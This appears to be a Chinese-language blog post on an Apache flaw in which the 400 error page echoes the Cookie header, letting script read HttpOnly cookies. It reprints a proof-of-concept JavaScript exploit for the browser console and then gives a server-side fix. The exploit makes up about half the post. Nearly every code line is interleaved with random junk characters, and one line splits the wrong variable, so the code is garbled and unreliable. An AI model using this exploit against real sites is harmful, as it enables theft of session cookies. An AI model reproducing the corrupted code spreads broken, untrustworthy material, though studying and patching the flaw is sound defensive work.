很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 Cookie,一般都会给 Cookie 加上 httponly 属性,禁止 JS 直接读取用户的 Cookie,从而降低 XSS 的危害;而 Apache 的这个问题刚好可以用来绕过 Cookie 的 httponly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,切换到 Console 输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
$ M* n" ^2 _) k1 N# p& |8 F- r, ?function setCookies (good) {
) O R- `, Q) g% {// Construct string for cookie value7 x9 R. w& H- i
var str = "";/ K( b7 p* C/ p( H0 N1 T
for (var i=0; i< 819; i++) {
" s. w% F# z' B+ K A9 `$ Wstr += "x";7 R/ `, S+ m. J9 Q4 `" M! V6 l
}7 W n8 m) j! m' r
// Set cookies
2 X8 E$ V- @9 e1 B, n ]4 B3 Tfor (i = 0; i < 10; i++) {
8 A& l0 ?9 G4 _! u9 J, ?# g// Expire evil cookie' z9 f6 R1 N6 ~5 t' E4 T, R
if (good) {6 N6 E- ^/ u" Q1 J
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
# z6 w- z: I$ b6 z$ @6 N}
8 s2 a! T' W& t6 ~7 ^. `// Set evil cookie6 ~6 N0 M: ^, o# {3 f
else {
" I- N, h2 @6 v! u- Q' e' a Fvar cookie = "xss"+i+"="+str+";path=/";9 \; }/ b" E. [0 |0 R. K5 z
}
, w4 V2 T/ |: [# I6 M& N4 mdocument.cookie = cookie;0 L' e8 x& \; F- O: H
} Z9 {2 m7 |2 Y( b6 u( g8 T% c L
}
// Defender note: sends a GET to "/" after padding the cookies, then lets the
// onreadystatechange handler read the server's 400 error page. Whatever the server
// puts inside <pre>...</pre> of that page (here: the raw "Cookie: ..." request line)
// becomes visible to script, HttpOnly or not. The server-side fix described below
// (a custom ErrorDocument 400 text, or an upgraded Apache) removes that echo.
; `$ s4 x3 k7 d7 }( u9 N$ o% Z6 O* Vfunction makeRequest() {5 `: ]4 J1 [! L' F( O
setCookies();2 u2 M& M: w) E+ ^4 z- M6 j- `4 [
// XHR readyState handler; `xhr` is the var declared further down in makeRequest
// (hoisted), so it is already assigned by the time this runs.
function parseCookies () {
) x) Z/ U, A! j3 Z* f4 M6 H. Kvar cookie_dict = {};8 h" i0 W: X3 U+ I1 Z: X/ \
// Only react on 400 status9 g* Q( r/ E4 {5 ~* F; t
if (xhr.readyState === 4 && xhr.status === 400) {) ]/ L" m, |4 Z% Q
// Replace newlines and match <pre> content! j9 |- M/ c" t, E1 r! x+ V
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
8 c( M. P( X3 R: Y% ^8 h5 A* k% Qif (content.length) {
! ^1 S4 V" Z- B/ O6 c// Remove Cookie: prefix
6 a. L# O6 C" }& Ccontent = content[1].replace("Cookie: ", "");$ T# w, X" b9 i, L* S6 v- K$ l' x9 Z Q
// Drop the padding cookies (xss0..xss9 = xxx...) before splitting on ';'
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
! ?8 U1 ?4 e. w6 e+ [8 s& y// Add cookies to object# e3 M: t$ u( o2 J; z* J
for (var i=0; i<cookies.length; i++) {! x1 v. E5 c+ X9 Y, f
var s_c = cookies.split('=',2);8 A; v) B0 U: `: k5 ]; z# {9 p( c' j
cookie_dict[s_c[0]] = s_c[1];; c) @ r1 \3 [) B0 D
}' y- p$ w) m( ? u
}
% ]3 _9 g. q- ^) o// Unset malicious cookies
// cleanup: expire the padding cookies set by setCookies() above
" \0 Q/ l# c' g7 e( {setCookies(true); f( M" j$ `9 a1 ^1 V8 `4 J% ]
alert(JSON.stringify(cookie_dict));- H/ G7 x+ G' X; B; d
}
, n- U R7 G1 d) f" |! i8 Z}
* T9 q. j) Q8 P) d8 R6 b) \// Make XHR request
$ o, r9 |( S9 y+ y+ }. N& ?4 Wvar xhr = new XMLHttpRequest();
8 i( `6 K5 W! D" ixhr.onreadystatechange = parseCookies;
% Y$ R, [" `0 m% A2 r7 b7 z# yxhr.open("GET", "/", true);
6 r) K9 P/ W" E; P* J2 r5 cxhr.send(null);
. m4 z# F& [* [9 r5 t, F}3 V5 O: r5 [; L; a
makeRequest();
你就能看见 400 错误响应中包含着(含 httponly 属性的)Cookie 信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:

Apache 官方文档(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument)提供 4 种错误处理方式,如下:

In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message —— 输出一个简单的硬编码错误信息
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
经测试,对于 400 错误只有方法 2(输出自定义信息)有效:自定义文本直接替代了会回显请求头的默认错误页,返回包不再包含 Cookie 内容。
Apache 配置:

ErrorDocument 400 " security test"
当然,升级 Apache 到最新版本(已修复此问题,见下方参考链接)也可以 :)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html